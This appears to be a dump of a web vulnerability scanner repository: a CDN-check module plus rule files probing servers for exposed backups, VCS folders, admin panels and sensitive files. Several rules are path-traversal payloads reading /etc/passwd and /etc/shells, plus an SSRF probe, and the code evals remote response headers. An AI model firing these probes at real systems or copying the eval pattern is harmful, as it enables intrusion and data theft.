9 | from config.log import logger
10 | import requests
11 | requests.packages.urllib3.disable_warnings()
12 | import re
13 | import asyncio
14 | import ipaddress
15 | import geoip2.database
16 | # Ignore HTTPS certificate verification
17 | import ssl
18 | if hasattr(ssl, '_create_unverified_context'):
19 | ssl._create_default_https_context = ssl._create_unverified_context
20 | import dns.resolver
21 | from urllib.parse import urlparse
22 | import time
23 | from concurrent.futures import ThreadPoolExecutor
24 | from lib.common.utils import load_json
25 | # Progress bar setup
26 | from rich.progress import (
27 | BarColumn,
28 | TimeRemainingColumn,
29 | Progress,
30 | )
31 |
32 | progress = Progress(
33 | "[progress.description]{task.description}",
34 | BarColumn(),
35 | "[progress.percentage]{task.percentage:>3.0f}%",
36 | TimeRemainingColumn(),
37 | "[bold red]{task.completed}/{task.total}",
38 | transient=True,  # hide the progress bar once it reaches 100%
39 | )
40 |
41 | data_dir = setting.data_storage_dir
42 |
43 |
44 | # from https://github.com/al0ne/Vxscan/blob/master/lib/iscdn.py
45 | cdn_ip_cidr = load_json(data_dir.joinpath('cdn_ip_cidr.json'))
46 | cdn_asn_list = load_json(data_dir.joinpath('cdn_asn_list.json'))
47 |
48 | # from https://github.com/Qclover/CDNCheck/blob/master/checkCDN/cdn3_check.py
49 | cdn_cname_keyword = load_json(data_dir.joinpath('cdn_cname_keywords.json'))
50 | cdn_header_key = load_json(data_dir.joinpath('cdn_header_keys.json'))
51 |
52 |
53 | def get_cname(cnames, cname): # get cname
54 | try:
55 | answer = dns.resolver.resolve(cname, 'CNAME')
56 | cname = [_.to_text() for _ in answer][0]
57 | cnames.append(cname)
58 | get_cname(cnames, cname)
59 | except dns.resolver.NoAnswer:
60 | pass
61 |
62 |
63 | def get_cnames(cnames, url): # get all cname
64 |
65 | if url.find('://') < 0:
66 | netloc = url[:url.find('/')] if url.find('/') > 0 else url
67 | else:
68 | scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
69 | try:
70 | answer = dns.resolver.resolve(netloc,'CNAME')
71 | except Exception as e:
72 | cnames = None
73 | else:
74 | cname = [_.to_text() for _ in answer][0]
75 | cnames.append(cname)
76 | get_cname(cnames, cname)
77 | return cnames  # return the list itself so the keyword check sees whole CNAME strings
78 |
79 |
80 | # get headers: the url must start with http:// or https://; do a quick check and prepend http:// if it is missing
81 | def get_headers(url):
82 | try:
83 | if not url.startswith("http://") and not url.startswith("https://"):
84 | url = "http://" + url
85 | response = requests.get(url, headers=setting.default_headers, timeout=10, verify=False)
86 | headers = str(response.headers).lower()
87 | except Exception as e:
88 | logger.log('DEBUG', f'url: {url} {repr(e)}')
89 | headers = None
90 | return headers
91 |
92 |
93 | def get_ip_list(url):
94 | if url.find('://') < 0:
95 | netloc = url[:url.find('/')] if url.find('/') > 0 else url
96 | else:
97 | scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
98 | ip_list = []
99 | try:
100 | addrs = socket.getaddrinfo(netloc, None)
101 | for item in addrs:
102 | if item[4][0] not in ip_list:
103 | ip_list.append(item[4][0])
104 | except Exception as e:
105 | logger.log('DEBUG', f'url: {url} {netloc} {repr(e)}')
106 | pass
107 | return ip_list
108 |
109 |
110 | def check_cdn_cidr(ips):
111 | for ip in ips:
112 | try:
113 | ip = ipaddress.ip_address(ip)
114 | except Exception as e:
115 | logger.log('DEBUG', e.args)
116 | return False
117 | for cidr in cdn_ip_cidr:
118 | if ip in ipaddress.ip_network(cidr):
119 | return True
120 |
121 |
122 | def check_cname_keyword(cname):
123 | for name in cname:
124 | for keyword in cdn_cname_keyword.keys():
125 | if keyword in name.lower():
126 | return True
127 |
128 |
129 | def check_header_key(headers):
130 | for key in cdn_header_key:
131 | if key in headers:
132 | return True
133 |
134 |
135 | def check_cdn_asn(ip):
136 | try:
137 | # https://www.maxmind.com/en/accounts/410249/geoip/downloads
138 | with geoip2.database.Reader(setting.data_storage_dir.joinpath('GeoLite2-ASN.mmdb')) as reader:
139 | for i in ip:
140 | response = reader.asn(i)
141 | asn = response.autonomous_system_number
142 | if str(asn) in cdn_asn_list:
143 | return True
144 | except Exception as e:
145 | pass
146 | return False
147 |
148 |
149 | # data = [{'cname' : cnames, 'headers' : headers, 'ip' : ip_list, 'url' : 'https://www.baidu.com'}]
150 | def run(url, task):
151 | progress.start_task(task)
152 | flag = False
153 | ip = get_ip_list(url)
154 | data = [{'cname': get_cnames([], url), 'headers': get_headers(url), 'ip': ip}]
155 | for index, item in enumerate(data):
156 | cname = item.get('cname')
157 | if cname:
158 | if check_cname_keyword(cname):
159 | flag = True
160 | try:
161 | headers = item.get('headers')
162 | if headers:
163 | headers = eval(headers).keys()
164 | if check_header_key(headers):
165 | flag = True
166 | except Exception as e:
167 | logger.log('FATAL', f'{url} {repr(e)}')
168 | pass
169 |
170 | ip = item.get('ip')
171 | if check_cdn_cidr(ip) or check_cdn_asn(ip):
172 | flag = True
173 |
174 | progress.update(task, advance=1)
175 | if flag:
176 | logger.log("DEBUG", f' {url} 存在CDN ')
177 | return ''
178 | else:
179 | return ip
180 |
181 |
182 | def check_cdn(processed_targets):
183 | ips = []
184 | # Create an event loop
185 | loop = asyncio.new_event_loop()
186 | asyncio.set_event_loop(loop)
187 | # Create a thread pool with 6 worker threads
188 | p = ThreadPoolExecutor(6)
189 | # Key step: run the blocking checks through the thread pool with loop.run_in_executor(), which takes the executor, the function to run, and its arguments
190 | tasks = []
191 |
192 | # Progress bar
193 | with progress:
194 | task = progress.add_task(f"[cyan]CDN check module ...", total=len(processed_targets), start=False)
195 |
196 | for target in processed_targets:
197 | target = target.replace('\n', '').replace('\r', '').strip()
198 | # Only run the CDN check against domain names; bare IPs in the target list are passed through
199 | if re.match(r"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$", target):
200 | ips.append(target)
201 | progress.update(task, advance=1)
202 | else:
203 | tasks.append(loop.run_in_executor(p, run, target, task))
204 |
205 | if len(tasks) > 0:
206 | # Use uvloop to speed up asyncio (not supported on Windows)
207 | import platform
208 | if platform.system() != "Windows":
209 | import uvloop
210 | asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
211 |
212 | # Wait for all tasks to complete
213 | result = asyncio.wait(tasks)
214 | loop.run_until_complete(result)
215 | for i in tasks:
216 | ips.extend(i.result())
217 | loop.close()
218 |
219 | return ips
220 |
221 |
--------------------------------------------------------------------------------
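A hedged usage sketch for the CDN-check module above: `check_cdn()` accepts a mixed list of domains and IPs, passes bare IPs straight through, and for domains returns their resolved IPs only when none of the CNAME/header/CIDR/ASN checks flag a CDN. The targets below are placeholders.

```python
# Hypothetical driver for lib/modules/iscdn.py (not part of SScan itself)
from lib.modules.iscdn import check_cdn

if __name__ == "__main__":
    targets = ["www.example.com", "203.0.113.5"]  # placeholder domain + IP
    non_cdn_ips = check_cdn(targets)
    print(non_cdn_ips)  # IPs that did not appear to be fronted by a CDN
```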
/logs/sscan.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/logs/sscan.log
--------------------------------------------------------------------------------
/report/_20210106_153943.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | BBScan 1.5 Scan Report
5 |
6 |
18 |
19 |
20 | Scanned 1 targets in
21 | 5 min 21.48 seconds .
22 | 1 vulnerable hosts found in total.
23 |
24 | https://ac2f1f241e07ad04807307cc002b0066.web-security-academy.net
25 |
30 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | fire
2 | beautifulsoup4
3 | rich
4 | pymongo
5 | pymysql
6 | psycopg2-binary
7 | uvloop; platform_system != "Windows"
8 | requests
9 | geoip2
10 | retrying
11 | yarl
12 | loguru
13 | dnspython
14 |
--------------------------------------------------------------------------------
/rules/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/rules/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/rules/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/rules/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/rules/.idea/rules.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/rules/apache.txt:
--------------------------------------------------------------------------------
1 | # Apache
2 | /.htaccess {status=200} {tag="htaccess"} {root_only}
3 | /.htpasswd {status=200} {tag="htpasswd"} {root_only}
4 | /.meta {status=200} {tag="meta"} {root_only}
5 | /.web {status=200} {tag="web"} {root_only}
6 | /access_log {status=200} {tag="access_log"} {root_only}
7 | /cgi {status=200} {tag="cgi"} {root_only}
8 | /cgi-bin {status=200} {tag="cgi-bin "} {root_only}
9 | /cgi-pub {status=200} {tag="cgi-pub"} {root_only}
10 | /cgi-script {status=200} {tag="cgi-script"} {root_only}
11 | /dummy {status=200} {tag="dummy"} {root_only}
12 | /error {status=200} {tag="error"} {root_only}
13 | /error_log {status=200} {tag="error_log"} {root_only}
14 | /htdocs {status=200} {tag="htdocs"} {root_only}
15 | /httpd {status=200} {tag="httpd"} {root_only}
16 | /httpd.pid {status=200} {tag="httpd.pid "} {root_only}
17 | /logs {status=200} {tag="logs"} {root_only}
18 | /manual {status=200} {tag="manual"} {root_only}
19 | /phf {status=200} {tag="phf"} {root_only}
20 | /printenv {status=200} {tag="printenv"} {root_only}
21 | /server-info {status=200} {tag="server-info"} {root_only}
22 | /server-status {status=200} {tag="server-status "} {root_only}
23 | /status {status=200} {tag="status"} {root_only}
24 | /test-cgi {status=200} {tag="test-cgi"} {root_only}
25 | /tmp {status=200} {tag="tmp"} {root_only}
26 | /~bin {status=200} {tag="~bin"} {root_only}
27 | /~ftp {status=200} {tag="~ftp"} {root_only}
28 | /~nobody {status=200} {tag="~nobody "} {root_only}
29 | /~root {status=200} {tag="~root"} {root_only}
--------------------------------------------------------------------------------
/rules/black.list:
--------------------------------------------------------------------------------
1 | # text to exclude in html doc
2 | # regex can be used
3 | # Matching entries will be discarded
4 | # {text="403 Forbidden "}
5 | # {text="You don't have permission to access this page"}
6 |
7 | # {text="/404/search_children.js"}
8 |
9 | {text="qzone.qq.com/gy/404/data.js"}
10 |
11 | {regex_text=".*页面不存在.*"}
12 |
13 | {regex_text=".*404.* "}
14 |
15 | {regex_text=".*页面没有找到.*"}
16 |
17 | {regex_text=".*页面不见.*"}
18 |
19 | {text="由于安全原因JSP功能默认关闭"}
20 |
21 | {text="404 Not Found"}
22 |
23 | {text="The server encountered an internal error or"}
24 |
25 | {text="Sorry, you are not permitted to view this page."}
26 |
27 | {text="http://www.qq.com/babygohome/?pgv_ref=404"}
28 |
29 | {text="
410 Gone "}
30 |
31 | {regex_text="controller.*not found"}
32 |
33 | {text="404 Page Not Found "}
34 |
35 | {text="Moved Permanently"}
36 |
37 | # {text="You do not have permission to get URL"}
38 |
39 | {text="Whoops, looks like something went wrong. "}
40 |
41 | {text="invalid service url:"}
42 |
43 | {text="当前页面不存在或已删除"}
44 |
45 | # {text="No direct script access allowed"}
46 |
47 | {text="HTTP Status 404 – Not Found "}
48 |
49 | {text="Controller Not Found"}
50 |
51 | {text="url error"}
52 |
53 | {text="Bad Request"}
54 |
55 | {text="http://appmedia.qq.com/media/flcdn/404.png"}
56 |
--------------------------------------------------------------------------------
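A minimal sketch of how entries in the blacklist format above (`{text="..."}` for literal matches, `{regex_text="..."}` for regexes) could be applied to a fetched page body; the tiny parser below is illustrative, not SScan's own loader:

```python
import re

# Illustrative entries in the black.list format above
rules = ['{text="404 Not Found"}', '{regex_text=".*页面不存在.*"}']

def is_blacklisted(body: str) -> bool:
    # Discard a response if any literal or regex rule matches its body
    for rule in rules:
        m = re.match(r'\{(text|regex_text)="(.+)"\}', rule)
        if not m:
            continue
        kind, pattern = m.groups()
        if kind == "text" and pattern in body:
            return True
        if kind == "regex_text" and re.search(pattern, body):
            return True
    return False

print(is_blacklisted("<title>404 Not Found</title>"))  # True
```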
/rules/change_log.txt:
--------------------------------------------------------------------------------
1 | # Chang Log
2 | /readme {status=200} {type_no="html"} {root_only}
3 | /README {status=200} {type_no="html"} {root_only}
4 | /readme.md {status=200} {type_no="html"} {root_only}
5 | /readme.html {status=200} {type="html"} {root_only}
6 | /changelog.txt {status=200} {type="text/plain"} {root_only}
--------------------------------------------------------------------------------
/rules/common_app.txt:
--------------------------------------------------------------------------------
1 | /ks/install {status=200} {type_no="html"}
--------------------------------------------------------------------------------
/rules/compressed_backup_files.txt:
--------------------------------------------------------------------------------
1 |
2 | /temp.zip {status=206} {type="application/"} {root_only}
3 | /temp.rar {status=206} {type="application/"} {root_only}
4 | /temp.tar.gz {status=206} {type="application/"} {root_only}
5 | /temp.tgz {status=206} {type="application/"} {root_only}
6 | /temp.tar.bz2 {status=206} {type="application/"} {root_only}
7 |
8 |
9 | /tmp.zip {status=206} {type="application/"} {root_only}
10 | /tmp.rar {status=206} {type="application/"} {root_only}
11 | /tmp.tar.gz {status=206} {type="application/"} {root_only}
12 | /tmp.tgz {status=206} {type="application/"} {root_only}
13 | /tmp.tar.bz2 {status=206} {type="application/"} {root_only}
14 |
15 |
16 | /package.zip {status=206} {type="application/"} {root_only}
17 | /package.rar {status=206} {type="application/"} {root_only}
18 | /package.tar.gz {status=206} {type="application/"} {root_only}
19 | /package.tgz {status=206} {type="application/"} {root_only}
20 | /package.tar.bz2 {status=206} {type="application/"} {root_only}
21 |
22 |
23 | /test.zip {status=206} {type="application/"} {root_only}
24 | /test.rar {status=206} {type="application/"} {root_only}
25 | /test.tar.gz {status=206} {type="application/"} {root_only}
26 | /test.tgz {status=206} {type="application/"} {root_only}
27 | /test.tar.bz2 {status=206} {type="application/"} {root_only}
28 |
29 |
30 | /backup.zip {status=206} {type="application/"} {root_only}
31 | /backup.rar {status=206} {type="application/"} {root_only}
32 | /backup.tar.gz {status=206} {type="application/"} {root_only}
33 | /backup.tgz {status=206} {type="application/"} {root_only}
34 | /back.tar.bz2 {status=206} {type="application/"} {root_only}
35 |
36 |
37 | /db.zip {status=206} {type="application/"} {root_only}
38 | /db.rar {status=206} {type="application/"} {root_only}
39 | /db.tar.gz {status=206} {type="application/"} {root_only}
40 | /db.tgz {status=206} {type="application/"} {root_only}
41 | /db.tar.bz2 {status=206} {type="application/"} {root_only}
42 | /db.inc {status=200} {type_no="html"}
43 | /db.sqlite {status=206} {type="application/"} {root_only}
44 |
45 |
46 | /db.sql.gz {status=206} {type="application/"} {root_only}
47 | /dump.sql.gz {status=206} {type="application/"} {root_only}
48 | /database.sql.gz {status=206} {type="application/"} {root_only}
49 | /backup.sql.gz {status=206} {type="application/"} {root_only}
50 | /data.sql.gz {status=206} {type="application/"} {root_only}
51 |
52 |
53 | /data.zip {status=206} {type="application/"} {root_only}
54 | /data.rar {status=206} {type="application/"} {root_only}
55 | /data.tar.gz {status=206} {type="application/"} {root_only}
56 | /data.tgz {status=206} {type="application/"} {root_only}
57 | /data.tar.bz2 {status=206} {type="application/"} {root_only}
58 |
59 |
60 | /database.zip {status=206} {type="application/"} {root_only}
61 | /database.rar {status=206} {type="application/"} {root_only}
62 | /database.tar.gz {status=206} {type="application/"} {root_only}
63 | /database.tgz {status=206} {type="application/"} {root_only}
64 | /database.tar.bz2 {status=206} {type="application/"} {root_only}
65 |
66 |
67 | /ftp.zip {status=206} {type="application/"} {root_only}
68 | /ftp.rar {status=206} {type="application/"} {root_only}
69 | /ftp.tar.gz {status=206} {type="application/"} {root_only}
70 | /ftp.tgz {status=206} {type="application/"} {root_only}
71 | /ftp.tar.bz2 {status=206} {type="application/"} {root_only}
72 |
73 | /web.zip {status=206} {type="application/"} {root_only}
74 | /web.rar {status=206} {type="application/"} {root_only}
75 | /web.tar.gz {status=206} {type="application/"} {root_only}
76 | /web.tgz {status=206} {type="application/"} {root_only}
77 | /web.tar.bz2 {status=206} {type="application/"} {root_only}
78 |
79 |
80 | /www.zip {status=206} {type="application/"} {root_only}
81 | /www.rar {status=206} {type="application/"} {root_only}
82 | /www.tar.gz {status=206} {type="application/"} {root_only}
83 | /www.tgz {status=206} {type="application/"} {root_only}
84 | /www.tar.bz2 {status=206} {type="application/"} {root_only}
85 |
86 | /wwwroot.zip {status=206} {type="application/"} {root_only}
87 | /wwwroot.rar {status=206} {type="application/"} {root_only}
88 | /wwwroot.tar.gz {status=206} {type="application/"} {root_only}
89 | /wwwroot.tgz {status=206} {type="application/"} {root_only}
90 | /wwwroot.tar.bz2 {status=206} {type="application/"} {root_only}
91 |
92 |
93 | /output.tar.gz {status=206} {type="application/"} {root_only}
94 |
95 |
96 | /admin.zip {status=206} {type="application/"} {root_only}
97 | /admin.rar {status=206} {type="application/"} {root_only}
98 | /admin.tar.gz {status=206} {type="application/"} {root_only}
99 | /admin.tgz {status=206} {type="application/"} {root_only}
100 | /admin.tar.bz2 {status=206} {type="application/"} {root_only}
101 |
102 | /upload.zip {status=206} {type="application/"} {root_only}
103 | /upload.rar {status=206} {type="application/"} {root_only}
104 | /upload.tar.gz {status=206} {type="application/"} {root_only}
105 | /upload.tgz {status=206} {type="application/"} {root_only}
106 | /upload.tar.bz2 {status=206} {type="application/"} {root_only}
107 |
108 | /website.zip {status=206} {type="application/"} {root_only}
109 | /website.rar {status=206} {type="application/"} {root_only}
110 | /website.tar.gz {status=206} {type="application/"} {root_only}
111 | /website.tgz {status=206} {type="application/"} {root_only}
112 | /website.tar.bz2 {status=206} {type="application/"} {root_only}
113 |
114 | /sql.zip {status=206} {type="application/"} {root_only}
115 | /sql.rar {status=206} {type="application/"} {root_only}
116 | /sql.tar.gz {status=206} {type="application/"} {root_only}
117 | /sql.tgz {status=206} {type="application/"} {root_only}
118 | /sql.tar.bz2 {status=206} {type="application/"} {root_only}
119 | /sql.7z {status=206} {type="application/"} {root_only}
120 |
121 | /data.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
122 | /database.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
123 | /db.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
124 | /test.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
125 | /admin.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
126 | /backup.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
127 | /dump.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
128 | /{sub}.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
129 |
130 | /index.zip {status=206} {type="application/"} {root_only}
131 | /index.7z {status=206} {type="application/"} {root_only}
132 | /index.bak {status=206} {type="application/"} {root_only}
133 | /index.rar {status=206} {type="application/"} {root_only}
134 | /index.tar.tz {status=206} {type="application/"} {root_only}
135 | /index.tar.bz2 {status=206} {type="application/"} {root_only}
136 | /index.tar.gz {status=206} {type="application/"} {root_only}
137 |
138 | /old.zip {status=206} {type="application/"} {root_only}
139 | /old.rar {status=206} {type="application/"} {root_only}
140 | /old.tar.gz {status=206} {type="application/"} {root_only}
141 | /old.tar.bz2 {status=206} {type="application/"} {root_only}
142 | /old.tgz {status=206} {type="application/"} {root_only}
143 | /old.7z {status=206} {type="application/"} {root_only}
144 |
145 | /1.tar.gz {status=206} {type="application/"} {root_only}
146 | /a.tar.gz {status=206} {type="application/"} {root_only}
147 |
148 | /conf/conf.zip {status=206} {type="application/"} {root_only}
149 | /conf.tar.gz {status=206} {type="application/"} {root_only}
150 | /config.tar.gz {status=206} {type="application/"} {root_only}
151 |
152 | /proxy.pac {status=206} {type="application/"} {root_only}
153 | /server.cfg {status=206} {type="application/"} {root_only}
154 |
155 | /deploy.tar.gz {status=206} {type="application/"} {root_only}
156 | /build.tar.gz {status=206} {type="application/"} {root_only}
157 | /install.tar.gz {status=206} {type="application/"} {root_only}
158 | /site.tar.gz {status=206} {type="application/"} {root_only}
159 | /webroot.zip {status=206} {type="application/"} {root_only}
160 | /tools.tar.gz {status=206} {type="application/"} {root_only}
161 | /webserver.tar.gz {status=206} {type="application/"} {root_only}
162 | /htdocs.tar.gz {status=206} {type="application/"} {root_only}
163 | /src.tar.gz {status=206} {type="application/"} {root_only}
164 | /code.tar.gz {status=206} {type="application/"} {root_only}
165 |
--------------------------------------------------------------------------------
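All of the backup-file rules above key on status 206 with an `application/` content type: the scanner presumably asks for only the first bytes of each candidate file via a Range header, so a real archive answers with Partial Content instead of a full download. A hedged sketch of such a probe (a standalone helper, not SScan's actual request code):

```python
import requests
requests.packages.urllib3.disable_warnings()

def probe_backup(url: str) -> bool:
    """Return True if url looks like a downloadable archive/backup."""
    # Request only the first 512 bytes; an existing file answers 206 Partial Content
    resp = requests.get(url, headers={"Range": "bytes=0-511"}, timeout=10, verify=False)
    ctype = resp.headers.get("Content-Type", "")
    return resp.status_code == 206 and ctype.startswith("application/")

# probe_backup("http://target.example/www.zip")   # placeholder target
```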
/rules/config_file.txt:
--------------------------------------------------------------------------------
1 | # Config
2 | /config.inc {status=200} {type_no="html"} {root_only}
3 | /config.php.bak {status=206} {type="application/octet-stream"} {tag="Index of"}
2 |
3 | # WordPress backup directories
4 | /wp-content/uploads/database-backups/ {status=200} {tag="Index of"}
5 | /wp-content/uploads/backup-database/ {status=200} {tag="Index of"}
6 |
--------------------------------------------------------------------------------
/rules/directory_traversal.txt:
--------------------------------------------------------------------------------
1 | # Directory traversal
2 |
3 | /etc/passwd {tag="root:x:"}
4 | /etc/shells {tag="/bin/bash"}
5 | /proc/meminfo {tag="MemTotal"} {status=200} {root_only}
6 | /etc/profile {tag="/etc/profile.d/*.sh"} {status=200} {root_only}
7 | /file:///etc/passwd {tag="root:x:"} {root_only}
8 |
9 | /../../../../../../../../../../../../../etc/shells {tag="/bin/bash"} {root_only}
10 | /../../../../../../../../../../../../../etc/profile {tag="/etc/profile.d/*.sh"} {root_only}
11 | //././././././././././././././././././././././././../../../../../../../../etc/profile {tag="/etc/profile.d/*.sh"} {root_only}
12 | /aa/../../cc/../../bb/../../dd/../../aa/../../cc/../../bb/../../dd/../../bb/../../dd/../../bb/../../dd/../../bb/../../dd/../../ee/../../etc/shells {status=200} {tag="/bin/bash"} {root_only}
13 |
14 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells {tag="/bin/bash"}
15 | /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshells {tag="/bin/bash"} {root_only}
16 | /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fshells {tag="/bin/bash"} {root_only}
17 | /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshells {tag="/bin/bash"} {root_only}
18 |
19 | /resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd {tag="root:x:"} {root_only}
--------------------------------------------------------------------------------
/rules/disabled/.gitignore:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/rules/disabled/.gitignore
--------------------------------------------------------------------------------
/rules/druid.txt:
--------------------------------------------------------------------------------
1 | # Druid
2 | /druid/websession.html {status=200} {type="html"} {tag="Druid未授权"} {root_only}
3 | /system/druid/websession.html {status=200} {type="html"} {tag="Druid未授权"} {root_only}
4 | /webpage/system/druid/websession.html(jeecg) {status=200} {type="html"} {tag="Druid未授权"} {root_only}
5 |
6 | /druid/login.html {status=200} {type="html"} {tag="Druid登录"} {root_only}
7 | /system/druid/login.html {status=200} {type="html"} {tag="Druid登录"} {root_only}
8 | /webpage/system/druid/login.html {status=200} {type="html"} {tag="Druid登录"} {root_only}
--------------------------------------------------------------------------------
/rules/git_and_svn.txt:
--------------------------------------------------------------------------------
1 | # SVN and Git
2 | /.svn/entries {status=200} {tag="-props"}
3 | /.git/config {status=200} {tag="[core]"} {root_only}
4 | /.git/index {status=200} {tag="DIRC"} {root_only}
5 | /.git/HEAD {status=200} {tag="refs/heads/"} {root_only}
--------------------------------------------------------------------------------
/rules/graphite_ssrf.txt:
--------------------------------------------------------------------------------
1 | /composer/send_email?to=orangetest@nogg&url=http://ww.cctvasdfasfsaasfasfs.com {status=200} {tag="gaierror: [Errno -2]"} {root_only}
--------------------------------------------------------------------------------
/rules/iis.txt:
--------------------------------------------------------------------------------
1 | /Micros~1 {status=200} {tag="IIS"} {root_only}
2 | /WebSer~1 {status=200} {tag="IIS"} {root_only}
3 | /_mem_bin {status=200} {tag="IIS"} {root_only}
4 | /_private {status=200} {tag="IIS"} {root_only}
5 | /_vti_adm {status=200} {tag="IIS"} {root_only}
6 | /_vti_aut {status=200} {tag="IIS"} {root_only}
7 | /_vti_bin {status=200} {tag="IIS"} {root_only}
8 | /_vti_cnf {status=200} {tag="IIS"} {root_only}
9 | /_vti_log {status=200} {tag="IIS"} {root_only}
10 | /_vti_pvt {status=200} {tag="IIS"} {root_only}
11 | /_vti_script {status=200} {tag="IIS"} {root_only}
12 | /_vti_txt {status=200} {tag="IIS"} {root_only}
13 | /administration {status=200} {tag="IIS"} {root_only}
14 | /adsamples {status=200} {tag="IIS"} {root_only}
15 | /archiv~1 {status=200} {tag="IIS"} {root_only}
16 | /aspnet_client {status=200} {tag="IIS"} {root_only}
17 | /asps {status=200} {tag="IIS"} {root_only}
18 | /bin {status=200} {tag="IIS"} {root_only}
19 | /bins {status=200} {tag="IIS"} {root_only}
20 | /cgi-bin {status=200} {tag="IIS"} {root_only}
21 | /cmsample {status=200} {tag="IIS"} {root_only}
22 | /common~1 {status=200} {tag="IIS"} {root_only}
23 | /db {status=200} {tag="IIS"} {root_only}
24 | /fpsample {status=200} {tag="IIS"} {root_only}
25 | /iisadmin {status=200} {tag="IIS"} {root_only}
26 | /iisadmpwd {status=200} {tag="IIS"} {root_only}
27 | /iishelp {status=200} {tag="IIS"} {root_only}
28 | /iissamples {status=200} {tag="IIS"} {root_only}
29 | /inetpub {status=200} {tag="IIS"} {root_only}
30 | /inetsrv {status=200} {tag="IIS"} {root_only}
31 | /isapi {status=200} {tag="IIS"} {root_only}
32 | /msadc {status=200} {tag="IIS"} {root_only}
33 | /pbserver {status=200} {tag="IIS"} {root_only}
34 | /printers {status=200} {tag="IIS"} {root_only}
35 | /progra~1 {status=200} {tag="IIS"} {root_only}
36 | /samples {status=200} {tag="IIS"} {root_only}
37 | /scripts {status=200} {tag="IIS"} {root_only}
38 | /scripts/samples {status=200} {tag="IIS"} {root_only}
39 | /scripts/tools {status=200} {tag="IIS"} {root_only}
40 | /sites {status=200} {tag="IIS"} {root_only}
41 | /siteserver {status=200} {tag="IIS"} {root_only}
42 | /system {status=200} {tag="IIS"} {root_only}
43 | /system_web {status=200} {tag="IIS"} {root_only}
44 | /web {status=200} {tag="IIS"} {root_only}
45 | /webpub {status=200} {tag="IIS"} {root_only}
46 | /winnt {status=200} {tag="IIS"} {root_only}
47 | /wwwroot {status=200} {tag="IIS"} {root_only}
48 | /x.cfm {status=200} {tag="IIS"} {root_only}
49 | /x.htx {status=200} {tag="IIS"} {root_only}
50 | /x.ida {status=200} {tag="IIS"} {root_only}
51 | /x.idc {status=200} {tag="IIS"} {root_only}
52 | /x.idq {status=200} {tag="IIS"} {root_only}
53 | /x.pl {status=200} {tag="IIS"} {root_only}
54 | /x.shtml {status=200} {tag="IIS"} {root_only}
55 |
--------------------------------------------------------------------------------
/rules/java_server_faces2.txt:
--------------------------------------------------------------------------------
1 | /javax.faces.resource.../WEB-INF/web.xml.jsf {status=200} {type="xml"} {tag="APC INFO"} {root_only}
9 |
--------------------------------------------------------------------------------
/rules/phpmyadmin.txt:
--------------------------------------------------------------------------------
1 |
2 | /phpmyadmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
3 | /phpMyAdmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
4 | /_phpmyadmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
5 | /pma/index.php {tag="phpMyAdmin"} {status=200} {root_only}
6 |
--------------------------------------------------------------------------------
/rules/possible_flash_xss.txt:
--------------------------------------------------------------------------------
1 | /ZeroClipboard.swf {status=206} {type="flash"}
2 | /zeroclipboard.swf {status=206} {type="flash"}
3 | /swfupload.swf {status=206} {type="flash"}
4 | /swfupload/swfupload.swf {status=206} {type="flash"}
5 | /open-flash-chart.swf {status=206} {type="flash"}
6 | /uploadify.swf {status=206} {type="flash"}
7 | /flowplayer.swf {status=206} {type="flash"}
8 | /Jplayer.swf {status=206} {type="flash"}
9 | /extjs/resources/charts.swf {status=206} {type="flash"}
--------------------------------------------------------------------------------
/rules/python_web.txt:
--------------------------------------------------------------------------------
1 | #django dev mode
2 | /42ea856c85e05b2a910c08df2e3d04d4 {tag="Django settings file"}
--------------------------------------------------------------------------------
/rules/resin_admin.txt:
--------------------------------------------------------------------------------
1 | # Resin Doc
2 | /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile {tag="/etc/profile.d/*.sh"} {root_only}
3 | /resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp {tag="This is the default start page for the Resin server"} {root_only}
4 | /resin-admin/ {status=200} {tag="Resin Admin Login for"} {root_only}
5 |
--------------------------------------------------------------------------------
/rules/safetyEquipment.txt:
--------------------------------------------------------------------------------
